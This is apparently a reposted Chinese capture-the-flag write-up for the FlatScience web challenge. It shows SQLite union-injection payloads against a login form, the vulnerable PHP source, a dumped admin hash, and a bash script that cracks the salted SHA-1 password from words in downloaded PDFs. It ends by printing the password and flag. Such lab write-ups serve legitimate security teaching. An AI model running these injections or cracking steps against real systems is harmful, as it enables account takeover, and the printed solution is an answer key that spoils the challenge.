当前位置: 首页 > article >正文

CTF 攻防世界 Web: FlatScience write-up

题目名称-FlatScience

 网址 index 目录中没有发现提示信息,链接会跳转到论文。

 

目前没有发现有用信息,尝试目录扫描。

目录扫描

 注意到存在 robots.txt 和 login.php。

访问 robots.txt

这里表明还存在 admin.php

admin.php 分析

在这里尝试一些 sql 注入提交,但是不能成功,显然被过滤了。

 网页代码中发现有不要尝试绕过的提示。

这里可以先暂时放一放,看看其他页面。

login.php 分析

先尝试 sql 注入

admin' or 1=1 #

返回了报错,而且数据库是 sqlite.

尝试注入

admin' or 1=1 --+

 结果又跳回到了 index.html 目录。

查看网页代码,发现有提示参数 debug

加上 debug 参数后,网页显示出 php 源代码: 

 

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body>


<div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div>

<h1>Login</h1>

Login Page, do not try to hax here plox!<br>


<form method="post">
  ID:<br>
  <input type="text" name="usr">
  <br>
  Password:<br> 
  <input type="text" name="pw">
  <br><br>
  <input type="submit" value="Submit">
</form>

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>

分析代码可以发现:

(1)sql 注入点就是在 urs 参数,方式为 admin' --

(2)密码与 "Salz!" 进行拼接并做了加盐处理。

(3)如果查询到了结果,用户名会被设置到 cookie 中,并重新返回到根目录。

这里就证明了我们开始的注入方法是正确的,而且 cookie 中可以看到用户名查询结果,下一步就可以利用 sql 注入结合返回的 cookie 值进行爆表了。

SQL 注入

admin' union select name,sql from sqlite_master --

这里发现 cookie 中没有回显出表信息,可能是因为查询到存在的 admin 被回显出来了,可以直接把 admin 去掉再尝试:

' union select name,sql from sqlite_master --

将得到的结果用 url 解码:

Users 表中的字段有 id;name;password;hint 几个值。

通过下面的语句爆破出它们的值

' union select id,id from Users limit 0,1--
' union select id,name from Users limit 0,1--
' union select id,password from Users limit 0,1--
' union select id,hint from Users limit 0,1--

可以得到第一列的结果如下:

idnamepasswordhint
1admin3fab54a50e770d830c0416df817567662a9dc85cmy fav word in my fav paper?!

把限制改为 limit 1,1 和 limit 2,1 可以得到下面两行的结果,但是本题用第一行的信息就足够了。

密码爆破

根据源码我们已经清楚了密码生成方式,即正确密码与字符 "Salz!" 拼接后用 sha1 处理后存储到数据库中。根据 hint 中的提示,这句话可以在首页源码中找到:

 in my fav paper 指向链接中的论文,提示中说明了密码很有可能就是论文中的某一个单词。

使用 wget 命令递归的把网址上 pdf 文件下载到本地,然后再读取出文件中的每一个单词,进行加密,把加密结果与哈希值进行对比。 

脚本如下:

#!/bin/bash
wget http://61.147.171.105:50766/ -r -np -nd -A .pdf
salt="3fab54a50e770d830c0416df817567662a9dc85c"
found=false
for f in *.pdf; do
    while read -r word; do
        comb="${word}Salz!"
        hs=$(echo -n "$comb" | sha1sum | awk '{print $1}')
        if [ "$hs" == "$salt" ]; then
            echo "[+] Find word: $word"
            found=true
            break
        fi
    done < <(pdftotext "$f" - | tr -c '[:alnum:]' '[\n*]')
    if [ "$found" = true ]; then
        break
    fi
done
if [ "$found" = false ]; then
    echo "[-] Find nothing!"
fi

注意使用命令 pdftotext 需要安装 poppler-utils:

sudo apt-get install poppler-utils

成功找到密码:

flag

把用户 admin 和密码 ThinJerboa 在 admin.php 中提交登录,得到 flag。

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}


http://www.kler.cn/a/441660.html

相关文章:

  • 本地 AI 模型“不实用”?
  • OSPF协议部分解读
  • nuxt3项目打包部署到服务器后配置端口号和开启https
  • Kafka-常见的问题解答
  • java知识框架
  • vue+高德API搭建前端Echarts图表页面
  • java+springboot+mysql学业跟踪指导管理系统
  • PHP 应用 ImageMagick
  • 回型矩阵:JAVA
  • 如何通过递延型指标预测项目的长期成果?
  • 多音轨视频使用FFmpeg删除不要音轨方法
  • 性能参数对比
  • Windows server 服务器网络安全管理之防火墙出站规则设置
  • Next.js流量教程:如何使用 Next.js 构建 SEO 友好的博客
  • 【Unity基础】Unity中拖拽3D物体的过程分析和实现方法
  • 〔 MySQL 〕视图
  • CMD使用SSH登陆Ubuntu
  • llm chat场景下的数据同步
  • 万字总结Python 设计模式:21种模式实际应用
  • 计算机网络安全复习
  • el-table 列的字段内容太多show-overflow-tooltip 不显示,数据列闪烁抖动
  • Unity Pico 实现离线TTS
  • Superset 和 Appsmith的对比
  • js 中将字符串转变为变量
  • Java项目--仿RabbitMQ的消息队列--内存数据管理
  • Qt WORD/PDF(四)使用 QAxObject 对 Word 替换(QWidget)